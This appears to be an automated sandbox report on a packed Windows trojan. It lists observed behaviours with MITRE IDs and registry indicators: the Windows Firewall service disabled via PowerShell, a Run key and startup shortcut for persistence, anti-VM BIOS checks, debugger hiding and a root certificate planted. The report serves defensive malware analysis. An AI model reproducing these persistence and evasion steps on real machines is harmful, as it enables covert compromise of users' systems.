dadd40388f9a905045d64f97926682305814135365ca274f5bc83ce27f71abd0

Analysis

max time kernel
150s
max time network
128s
platform
windows7_x64
resource
win7-en-20211208
submitted
11-02-2022 23:43

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

dadd40388f9a905045d64f97926682305814135365ca274f5bc83ce27f71abd0.exe
Size

3.5MB
MD5

dec26ba8f682fe0dc0608af5e882544a
SHA1

a7298d5c29445ad9d34eee31bd89a9962915f84b
SHA256

dadd40388f9a905045d64f97926682305814135365ca274f5bc83ce27f71abd0
SHA512

1caf7547171a4365dc16bd3b6d491145dfef84b38d85852a7881ba976a271d901c0d2d469c7992057e5b5b473f3116863ee7a8a9ec8b26a02f8f37e76042286c

Score

10^/10

evasion persistence themida trojan

Malware Config

Signatures

Modifies security service 2 TTPs 1 IoCs
evasion

Modify Registry
T1112

Modify Existing Service
T1031

Processes:

powershell.exe

description ioc process

Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\MpsSvc\Start = "4" powershell.exe
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
evasion

Query Registry
T1012

Virtualization/Sandbox Evasion
T1497
Downloads MZ/PE file

description	ioc	process
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\MpsSvc\Start = "4"	powershell.exe

Executes dropped EXE 44 IoCs

Processes:

Database.exeUpSys.exeUpSys.exeDatabase.exeUpSys.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exe

pid	process
1196	Database.exe
1980	UpSys.exe
1764	UpSys.exe
1500	Database.exe
1544	UpSys.exe
1540	Database.exe
1720	Database.exe
1748	Database.exe
868	Database.exe
924	Database.exe
1088	Database.exe
1120	Database.exe
1412	Database.exe
1736	Database.exe
1668	Database.exe
1196	Database.exe
1500	Database.exe
1648	Database.exe
672	Database.exe
1560	Database.exe
1668	Database.exe
1332	Database.exe
1192	Database.exe
1412	Database.exe
1632	Database.exe
1104	Database.exe
884	Database.exe
1000	Database.exe
1652	Database.exe
1972	Database.exe
1612	Database.exe
1204	Database.exe
1164	Database.exe
1624	Database.exe
1996	Database.exe
836	Database.exe
2000	Database.exe
268	Database.exe
1516	Database.exe
2044	Database.exe
1068	Database.exe
1728	Database.exe
676	Database.exe
1512	Database.exe

Modifies Windows Firewall 1 TTPs
evasion

Modify Existing Service
T1031

Checks BIOS information in registry 2 TTPs 64 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

Database.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exedadd40388f9a905045d64f97926682305814135365ca274f5bc83ce27f71abd0.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	Database.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	Database.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	Database.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	Database.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	Database.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	Database.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	Database.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	Database.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	Database.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	Database.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	Database.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	Database.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	Database.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	Database.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	Database.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	Database.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	Database.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	Database.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	Database.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	Database.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	Database.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	Database.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	Database.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	Database.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	Database.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	Database.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	Database.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	Database.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	Database.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	Database.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	Database.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	Database.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	Database.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	Database.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	Database.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	Database.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	Database.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	Database.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	Database.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	Database.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	Database.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	Database.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	Database.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	Database.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	dadd40388f9a905045d64f97926682305814135365ca274f5bc83ce27f71abd0.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	Database.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	Database.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	Database.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	Database.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	Database.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	Database.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	Database.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	Database.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	Database.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	Database.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	Database.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	dadd40388f9a905045d64f97926682305814135365ca274f5bc83ce27f71abd0.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	Database.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	Database.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	Database.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	Database.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	Database.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	Database.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	Database.exe

Drops startup file 1 IoCs

Processes:

dadd40388f9a905045d64f97926682305814135365ca274f5bc83ce27f71abd0.exe

description	ioc	process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\exe.lnk	dadd40388f9a905045d64f97926682305814135365ca274f5bc83ce27f71abd0.exe

Loads dropped DLL 3 IoCs

Processes:

dadd40388f9a905045d64f97926682305814135365ca274f5bc83ce27f71abd0.exepowershell.exe

pid	process
832	dadd40388f9a905045d64f97926682305814135365ca274f5bc83ce27f71abd0.exe
832	dadd40388f9a905045d64f97926682305814135365ca274f5bc83ce27f71abd0.exe
976	powershell.exe

Themida packer 3 IoCs

Detects Themida, an advanced Windows software protection system.

themida

Processes:

resource	yara_rule
behavioral1/memory/832-54-0x000000013FB10000-0x000000014047F000-memory.dmp	themida
behavioral1/memory/832-55-0x000000013FB10000-0x000000014047F000-memory.dmp	themida
\ProgramData\MicrosoftNetwork\System.exe	themida

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

powershell.exe

description	ioc	process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WinNet = "C:\\ProgramData\\MicrosoftNetwork\\System.exe"	powershell.exe

Checks whether UAC is enabled 1 TTPs 42 IoCs

evasion trojan

System Information Discovery

T1082

Processes:

Database.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exedadd40388f9a905045d64f97926682305814135365ca274f5bc83ce27f71abd0.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	Database.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	Database.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	Database.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	Database.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	Database.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	dadd40388f9a905045d64f97926682305814135365ca274f5bc83ce27f71abd0.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	Database.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	Database.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	Database.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	Database.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	Database.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	Database.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	Database.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	Database.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	Database.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	Database.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	Database.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	Database.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	Database.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	Database.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	Database.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	Database.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	Database.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	Database.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	Database.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	Database.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	Database.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	Database.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	Database.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	Database.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	Database.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	Database.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	Database.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	Database.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	Database.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	Database.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	Database.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	Database.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	Database.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	Database.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	Database.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	Database.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102

Suspicious use of NtSetInformationThreadHideFromDebugger 64 IoCs

Processes:

dadd40388f9a905045d64f97926682305814135365ca274f5bc83ce27f71abd0.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exe

pid	process
832	dadd40388f9a905045d64f97926682305814135365ca274f5bc83ce27f71abd0.exe
1196	Database.exe
1196	Database.exe
1196	Database.exe
1500	Database.exe
1500	Database.exe
1500	Database.exe
1540	Database.exe
1540	Database.exe
1540	Database.exe
1720	Database.exe
1720	Database.exe
1720	Database.exe
1748	Database.exe
1748	Database.exe
1748	Database.exe
868	Database.exe
868	Database.exe
868	Database.exe
924	Database.exe
924	Database.exe
924	Database.exe
1088	Database.exe
1088	Database.exe
1088	Database.exe
1120	Database.exe
1120	Database.exe
1120	Database.exe
1412	Database.exe
1412	Database.exe
1412	Database.exe
1736	Database.exe
1736	Database.exe
1736	Database.exe
1668	Database.exe
1668	Database.exe
1668	Database.exe
1196	Database.exe
1196	Database.exe
1196	Database.exe
1500	Database.exe
1500	Database.exe
1500	Database.exe
1648	Database.exe
1648	Database.exe
1648	Database.exe
672	Database.exe
672	Database.exe
672	Database.exe
1560	Database.exe
1560	Database.exe
1560	Database.exe
1668	Database.exe
1668	Database.exe
1668	Database.exe
1332	Database.exe
1332	Database.exe
1332	Database.exe
1192	Database.exe
1192	Database.exe
1192	Database.exe
1412	Database.exe
1412	Database.exe
1412	Database.exe

Drops file in Windows directory 1 IoCs

Processes:

makecab.exe

description ioc process

File created C:\Windows\Logs\CBS\CbsPersist_20220211234354.cab makecab.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

description	ioc	process
File created	C:\Windows\Logs\CBS\CbsPersist_20220211234354.cab	makecab.exe

Modifies data under HKEY_USERS 5 IoCs

Processes:

UpSys.exepowershell.exe

description	ioc	process
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	UpSys.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0"	UpSys.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1"	UpSys.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage	powershell.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = 50df683ba11fd801	powershell.exe

Modifies system certificate store 2 TTPs 3 IoCs

evasion spyware trojan

Install Root Certificate

T1130

Modify Registry

T1112

Processes:

dadd40388f9a905045d64f97926682305814135365ca274f5bc83ce27f71abd0.exe

description	ioc	process
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 0f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a8090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703085300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc30b00000001000000120000004400690067006900430065007200740000001d00000001000000100000008f76b981d528ad4770088245e2031b630300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc252000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a	dadd40388f9a905045d64f97926682305814135365ca274f5bc83ce27f71abd0.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 190000000100000010000000ba4f3972e7aed9dccdc210db59da13c90300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc251d00000001000000100000008f76b981d528ad4770088245e2031b630b0000000100000012000000440069006700690043006500720074000000140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc35300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703080f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a82000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a	dadd40388f9a905045d64f97926682305814135365ca274f5bc83ce27f71abd0.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25	dadd40388f9a905045d64f97926682305814135365ca274f5bc83ce27f71abd0.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

dadd40388f9a905045d64f97926682305814135365ca274f5bc83ce27f71abd0.exepowershell.exeUpSys.exeUpSys.exepowershell.exe

pid	process
832	dadd40388f9a905045d64f97926682305814135365ca274f5bc83ce27f71abd0.exe
832	dadd40388f9a905045d64f97926682305814135365ca274f5bc83ce27f71abd0.exe
832	dadd40388f9a905045d64f97926682305814135365ca274f5bc83ce27f71abd0.exe
832	dadd40388f9a905045d64f97926682305814135365ca274f5bc83ce27f71abd0.exe
976	powershell.exe
832	dadd40388f9a905045d64f97926682305814135365ca274f5bc83ce27f71abd0.exe
832	dadd40388f9a905045d64f97926682305814135365ca274f5bc83ce27f71abd0.exe
832	dadd40388f9a905045d64f97926682305814135365ca274f5bc83ce27f71abd0.exe
832	dadd40388f9a905045d64f97926682305814135365ca274f5bc83ce27f71abd0.exe
832	dadd40388f9a905045d64f97926682305814135365ca274f5bc83ce27f71abd0.exe
832	dadd40388f9a905045d64f97926682305814135365ca274f5bc83ce27f71abd0.exe
832	dadd40388f9a905045d64f97926682305814135365ca274f5bc83ce27f71abd0.exe
832	dadd40388f9a905045d64f97926682305814135365ca274f5bc83ce27f71abd0.exe
832	dadd40388f9a905045d64f97926682305814135365ca274f5bc83ce27f71abd0.exe
1980	UpSys.exe
1980	UpSys.exe
832	dadd40388f9a905045d64f97926682305814135365ca274f5bc83ce27f71abd0.exe
832	dadd40388f9a905045d64f97926682305814135365ca274f5bc83ce27f71abd0.exe
832	dadd40388f9a905045d64f97926682305814135365ca274f5bc83ce27f71abd0.exe
1764	UpSys.exe
1764	UpSys.exe
832	dadd40388f9a905045d64f97926682305814135365ca274f5bc83ce27f71abd0.exe
832	dadd40388f9a905045d64f97926682305814135365ca274f5bc83ce27f71abd0.exe
832	dadd40388f9a905045d64f97926682305814135365ca274f5bc83ce27f71abd0.exe
832	dadd40388f9a905045d64f97926682305814135365ca274f5bc83ce27f71abd0.exe
832	dadd40388f9a905045d64f97926682305814135365ca274f5bc83ce27f71abd0.exe
832	dadd40388f9a905045d64f97926682305814135365ca274f5bc83ce27f71abd0.exe
832	dadd40388f9a905045d64f97926682305814135365ca274f5bc83ce27f71abd0.exe
832	dadd40388f9a905045d64f97926682305814135365ca274f5bc83ce27f71abd0.exe
